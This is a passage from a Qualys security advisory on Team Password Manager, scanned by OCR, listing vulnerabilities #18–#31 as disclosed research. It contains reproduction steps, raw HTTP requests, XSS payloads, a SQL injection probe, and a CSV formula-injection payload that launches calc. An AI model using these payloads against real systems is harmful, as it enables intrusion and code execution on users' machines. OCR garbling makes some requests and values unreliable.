Cookie: PHPSESSID=72v 1599661 70vdb4rh8me4clo3; TPM_LANG=ffffffffff 
Connection: close 

Upgrade-Insecure-Requests: 1 


AR WN > 


csrft=8 1930364cce3e9bb807b57f3f9cbb8eb76f2cd08&group_id=19&user=8' 


6. Following is the Response of above query: 


There has been the following exception, please send it to Team Password Manager support (http://teampasswordmanager.com/support/): 
ErrorException Object 
( 
[message:protected] => Undefined index: 8' 
[string:Exception:private] => 
[code:protected] => 8 
[file:protected] => /var/www/html/tpm/wmm/controllers/groups.php 
[line:protected] => 496 
[trace:Exception:private] => Array 
( 
[0] => Array 
( 
[file] => /var/www/html/tpm/wmm/controllers/groups.php 
[line] => 496 
[function] => my error handler 
[args] => Array 
( 
[0] => 8 
[1] => Undefined index: 8' 
[2] => /var/www/html/tpm/wmm/controllers/groups.php 
[3] => 496 
[4] => Array 


[id] => 19 
[data] => Array 
( 
[group_data] => Array 
( 

[id] => 19 
[name] => "><img>'' 
[created_on] => 2018-03-07 17:36:07 
[created by] => 1 
[updated_on] => 2018-03-07 20:08:21 


Vulnerability #18: Privilege Escalation — Default Language 


Any authenticated User can change default language of ‘Admin’. A Read-only user also can 
change the default language of admin user. 


RISK FACTOR: Low 


URL: http://<server ip>/<tpm path>/index.php/user_info/clang 


How to reproduce: 


1. Login to application with any other than admin role user (A read-only user can also 
change default language.) 

2. Go to its setting page, and click on Change language button. 

3. Change the user_id parameter to ‘1’ (assuming admin user will always have user_id as 
“1’) and new lang parameter to any arbitrary value, in the Request as shown below: 


POST /tpm index .php/user_info/clang NTTP/ 1.1 
Host: 
User-Agent: Mosilla/5.0 (Windows NT 10.0; Winé4; x64; rv: 58 
Accept: text/html, appl ication/xhtml+xml , appl ication/xml ; q=0 
Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gsip, deflate 

Referer: / index .php/usex_info/ clang 
Content-Type: appl ication/x-www-form-urlencoded 
Content-Length: ES 

Cookie: PHPSESS ID=Sw3mn3v437m80mkqs47081as82 

Connection: close 


Upgrade-Insecure-Requests: 1 


-0) Gecko/ 20100101 Firefox/ 58.0 
_S,*/*;q=0.8 


esrft=Sfdc7TIEdadsbSllOLIThHalVafScSS43deSfe4°SSaduser id=lénew 1] ang=AAAAAAAAAAA 


below: 


Data Log API Keys 


Username: admin 


Name: admin 


Role: | Admin 
Language: | AAAAAAAAAA - (No description 


Groups: 


Last Signed in: Mar 5, 2018 16:23 
Created on: Feb 27, 2018 08:31 
By: admin 


Now the default language of ‘admin’ user has been set to ‘AAAAAAAAAAA’, as shown 


Change Language 


Last API request: - 
Updated on: Mar 5, 2018 16:23 
By: ro 


Vulnerability #19: Self Reflected Cross-site Scripting — Password Tag 


Self Reflected Cross-site Scripting vulnerability found in Password Tag field. A user can create 
new/modify Password. 


RISK FACTOR: Low 


How to Reproduce: 


a eS 


Click on new password. 
Select Parent Project. 


Add following in Tag field: "> <script>alert('xss') </script>, 


It will show alert box 


XSS 


| Prevent this page from creating additional dialogs 


a) 


Vulnerability #20: Self Reflected Cross-site Scripting — Project Tag 


Self Reflected Cross-site Scripting vulnerability found in Password Tag field. A user can create 
new/modify Password. 


RISK FACTOR: 
How to Reproduce: 


1. Click on new Project. 
2. Add following in Tag field: 
3. It will show alert box 


Vulnerability #21: Self Reflected Cross-site Scripting — My Password Tag 


Self Reflected Cross-site Scripting vulnerability found in Password Tag field. A user can create 
new/modify Password. 


RISK FACTOR: Low 
How to Reproduce: 


Click on “My Passwords”. 

Click on “New Password” 

Add following in Tag field: "> <script>alert('xss') </script>, 
It will show alert box 


ee ee 


Vulnerability #22: Insecure Session Handling 


User can access already established session from blocked IP and until user logs out. Application 
allows user to access already established session in following two conditions: 


1. If session is accessed from Blocked IP. 
2. If Logged in User’s Access changed to API Only. 
RISK FACTOR: Low 


How to Reproduce: 


Session is accessible from Blocked IP: 
1. Login to application using any of the users from one browser. 
Login to application using ‘admin’ user from different machine. 
Go to ‘IP Address Blocking’ page in ‘Settings’ tab. 
Click on ‘New IP Block’ Button 
Add the IP of machine from which user is logged in Step 1. 
The already established session of user in Step 1 will be accessible until, the user gets 
logs out. 


SAN ae 


Session is accessible to API Only User: 


Login to application using any of the users from one browser. 

Login to application using ‘admin’ user from different machine. 

Go to ‘Users/Groups’ tab. 

Go to User’s setting page which is which logged-in in Step 1. 

Click on ‘Set as API only User’ Button 

The already established session of the same user in Step | will be accessible until, the 
user gets logs out. 


NN Pe nai 


Vulnerability #23: SQL injection on Edit Group page 


Application does not sanitize group_id parameter value before sending it to backend database. 
Due to that it is possible to inject arbitrary data in backend database. 


The application is vulnerable but this issue looks like non-exploitable as only “DOUBLE” values 
are allowed which is not helpful for exploitation purpose. During our assessment this issue was not 
exploited. 


RISK FACTOR: Low 
How to Reproduce: 


Note - Reproducible with TPM Free Version With PHP 5.6.34-1 


e a D 10.113.192.189/t ups —~ Or 


Ei Home @BUsers/Groups [Blog 4 Setting 


You're using the FREE VERSION of Team Password Manager, which only allows you to have 2 users and 5 projects. 
Click here for more users and projects 


AM Geaupe Edit Group: user1group1 
Name* | userigroupi 
* = required fields 
Team Password Manager : tearmpasswordmanager.com « EULA and other licenses - Help : Advanced Search Help 


POST /tpm/index.php/groups/edit/1 HTTP/1.1 
Host: 10.113.192.189 


User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:58.0) Gecko/20100101 
Firefox/58.0 

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http://10.113.192.189/tpm/index.php/groups/edit/1 
Content-Type: application/x-www-form-urlencoded 

Content-Length: 76 

Cookie: PHPSESSID=jtna108jjrllrvmqac3stqh2p4 

Connection: close 

Upgrade-Insecure-Requests: 1 


csrft=4f9d26cbf09a626e7 1e5e62138 1cd3080fe3f728&group_id=1'&name=user1 group4 


Response: 


= a © 10.113.192.189/tpm/index.php/groups/edit/1 Hs Or 


There has been the following exception, please send it to Team Password Manager support (http://teampasswordmanager .com/support/): 
Exception Object 
( 
[message:protected] => Truncated incorrect DOUBLE value: '1'' 
[string:Exception:private] => 
[code:protected] => 500 
[file:protected] => /var/www/html/tpm/wmm/core/MY_Exceptions.php 
[line:protected] => 77 
[trace:Exception:private] => Array 
[0] => Array 
( 
[file] => /var/www/html/tpm/system/database/DB_driver.php 
[line] => 1197 
[function] => show_error 
[class] => MY_Exceptions 
[type] => -> 
[args] => Array 
( 
[0] => A Database Error Occurred 
[1] => Array 
( 
[0] => Error Number: 1292 
[1] => Truncated incorrect DOUBLE value: '1'' 
[2] => UPDATE “wmm groups” SET “name~ = 'userlgroup4', ~updated_by~ = '1', “updated on" = '2018-03-09 15:27:45' WHERE “id “aye 
[3] => Filename: /var/www/html/tpm/models/m_grp.php 
[4] => Line Number: 107 
) 


[2] => error_db 


) 
[1] => Array 
( 


[file] => /var/www/html/tpm/system/database/DB_driver.php 
[lin 


There has been the following exception, please send it to Team Password Manager support 
(http://teampasswordmanager.com/support/): 


Exception Object 
( 
[message:protected] => Truncated incorrect DOUBLE value: '1" 
[string:Exception:private] => 
[code:protected] => 500 
[file:protected] => /var/www/html/tpm/wmm/core/MY_Exceptions.php 
[line:protected] => 77 
[trace:Exception:private] => Array 
( 
[0] => Array 
( 


[file] => /var/www/html/tpm/system/database/DB_driver.php 
[line] => 1197 
[function] => show_error 
[class] => MY_Exceptions 
[type] => -> 
[args] => Array 
( 
[0] => A Database Error Occurred 
[1] => Array 
( 
[0] => Error Number: 1292 
[1] => Truncated incorrect DOUBLE value: '1" 
[2] => UPDATE wmm groups. SET name = 'userlgroup4’, `updated_by` = '1', 
“updated_on* = '2018-03-09 15:27:45' WHERE “id = 'IN"! 
[3] => Filename: /var/www/html/tpm/models/m_grp.php 
[4] => Line Number: 107 


) 
[2] => error_db 
) 
) 
[1] => Array 
( 


[file] => /var/www/html/tpm/system/database/DB_driver.php 
[lin 


Vulnerability #24: Insecure Password Link Sharing 


The External Password Sharing feature is implemented insecurely. Following implementations are 
missing: 


1. External Password link remains same even after changing password. 
2. External Password Sharing has no timeout implemented. 
RISK FACTOR: Low 


How to Reproduce: 
External Password link remains same even after changing password: 


1. Go to ‘Password’ of any of the project. 

2. Enable the ‘External Sharing’ feature. This will generate one URL which can be shared 
with anyone who can access this application. 

3. Now Change the password. 

4. Access the above mentioned link, it will show the changed password. 


Ideally if password is changed then the old link should get discarded/replaced with new sharing 
link. 


Vulnerability #25: Self Reflected Error based Cross-site Scripting 
Custom field label is vulnerable to cross-site Scripting vulnerability. 
RISK FACTOR: 

How to Reproduce: 


Go to a Project. Click C.F. Template 

Add custom field label as 

Select Type as email & Save it 

Click New Password. 

Add any Invalid email address in the custom email field. Click on Save. 


ae KI 


Email_field 


es 


Vulnerability #26: Self Reflected Cross-site Scripting - Search Box 


Custom field label is vulnerable to self only cross-site scripting vulnerability. 


Parameter: search_box 


RISK FACTOR: Low 


How to Reproduce: 


1. Open http://192.168.2: 


/tpm/index.t 


72.106 pm. t_list (search templates) 
2. Add payload in search box - "><img src=xx onerror=alert(2)> 


(€)> @ © 192.168.249.107/tpm/index.php/settings/cft_list 


Vulnerability #27: Self Reflected Cross-site Scripting - IP Address Blocking 
Configuration 


IP Address Blocking functionality is vulnerable to self reflected cross-site Scripting 
vulnerability. 


URL: 


htt 


hitas HI OD ah 1 /. 
http://192.16: 1, 


http: 


Parameter: search_box 


RISK FACTOR: Low 
How to Reproduce: 


3. Open above mentioned URL in browser 
4. Add payload in search box respectively 
"><img src=xx onerror=alert(“ip_filter_manul”)> 


"><img src=xx onerror=alert(“ip_filter_automatic”)> 
"><img src=xx onerror=alert(“ipb_list”)> 


E)> X a @® 192.168.249.107/tpm/index.php/settings/ipb_list E = 9 ad a 


ipb_list 


ores) 


(€¢)> X @ | © 192.168.249.107/tpm/index.php/settings/ipb_list 


ip_filter_manul 


G OOOO 
<\- xX @ © 192.168.249.107/tpm/index.php/settings/ipb_list 


ip_filter_automatic 


Co ] 


Vulnerability #28: Self Reflected Cross-site Scripting - Log Filter 


Log filter fields are vulnerable to self only cross-site scripting vulnerability. 
URL: http://192.168.249.107/tpm/index.php/alog 

Parameter: password, project, ip_address, additional 

RISK FACTOR: Low 

How to Reproduce: 


1. Open filter box on - http://192.168.249.107/tpm/index.php/alog 


2. Add payload in above mentioned fields - "><img src=xx onerror=alert(111)> 


7 E 
(€)> X @ © 192.168.249.107/tpm/index.php/alog .. © Ye. |Q Search 


(EID X @ © 192.168.249.107/tpm/index.php/alog .. O % | Search 


€&)> X @ — | ®© 192168.249.107/tpm/index.php/alog -Os 


Se GE a aaa 
(€)> X @ © 192.168.249.107/tpm/index.php/alog ose Ww a Search 


additonal_data 


Vulnerability #29: Self Reflected Cross-site Scripting - User Search Box 
User search box is vulnerable to self only cross-site scripting vulnerability. 
URL: http://192.168.250.8 1/tpm/index.php/users 
Parameter: search_box 
RISK FACTOR: Low 
How to Reproduce: 


1. Open http://192.168.249.107/tpm/index.php/users (search box). 
2. Add payload in search box - "><img src=xx onerror=alert(“search_users”)> 


(E)> X @ © 192.168.249.107/tpm/index.php/users 


search_users 


[ox | 


Vulnerability #30: Self Reflected Cross-site Scripting - Group Search Box 
Group search box is vulnerable to self only cross-site scripting vulnerability. 
URL: http://192.168.249.107/tpm/index.php/groups 
Parameter: search_box 
RISK FACTOR: Low 
How to Reproduce: 


5. Open - htt ( groups (search groups) 
6. Add payload in oad tae "><img src=xx onerror=alert(“search_group”)> 


-E E] 
NBK © 192.168.249.107/tpm/index.php/groups —~ OY 


search_group 


eS 


Vulnerability #31: CSV Injection Vulnerability 


Application provides functionality to export data in CSV format. This exported data is not 
sanitized before adding into CSV files. This leads to CSV injection vulnerability. 


Attacker can inject malicious code into application data which will execute malicious code on user 
machine when user open downloaded CSV file. 


URL: http://192.168.249.107/tpm/index.php/settings/view/export_import 


RISK FACTOR: Medium 


How to Reproduce: 


1. Go to any Project 

2. Add new Password 

3. Add following payload in any of the password fields: 
=cmd|' /C calc'!AO 


test 
Project: PMproject 


Edit Notes Upload File Custom Fields Security Locking Ext. Sharing Duplicate Copy Move 


Data Security History Log 


& Username: | =cmd/' /C calc'lA0 


4. Go to ‘Settings’. 

5. Click on ‘Export Passwords’ button in ‘Export / Import’ 

6. Select the Project in which above password is added. 

7. Export passwords of the mentioned projet. 

8. Open Exported file in ‘Excel’, the payload will get executed on user’s machine and it will 
open ‘Calculator’ as shown in screenshot 


Calculator = o x 
Insert Pagelayout Formulas Data e Q Tell me what you want to do = STANDARD 
| M+ M- MS = 
SUM x vY fx =cmd|' /C calc'|AO 
% v x? Ve 
A B c D E F G H 1 J K L Q R S 
1 Project na Name Access inf:Username E-mail Password Notes Tags Custom fieCustom 1 Custom 2 Custor CE c a 4 7 Custom 8 Custom 9 Custom (E) jj 
2 PMprojectaaaaa http://wwtest test@123. Password: testst $ # 4 
3 PMprojecttest =cmd|'/C calc'lAO aa\><i>aaa</i>" | 
4 i 8 9 x 
5 i 
= 4 5 6 = 
7 
R 
pmproject-2018-03-10 F 1 2 3 + 


CREDITS: 


The discovery and documentation of this vulnerability was conducted by Qualys Application 
Security and Research Team (QUASAR). 


CONTACT: 


For more information about the Qualys Security Research Team, visit our website at 
http://www.qualys.com or send email to quasar @qualys.com 


LEGAL NOTICE: 


The information contained within this advisory is Copyright (C) 2018 Qualys Inc. It may 
be redistributed provided that no fee is charged for distribution and that the advisory is 
not modified in any way. 


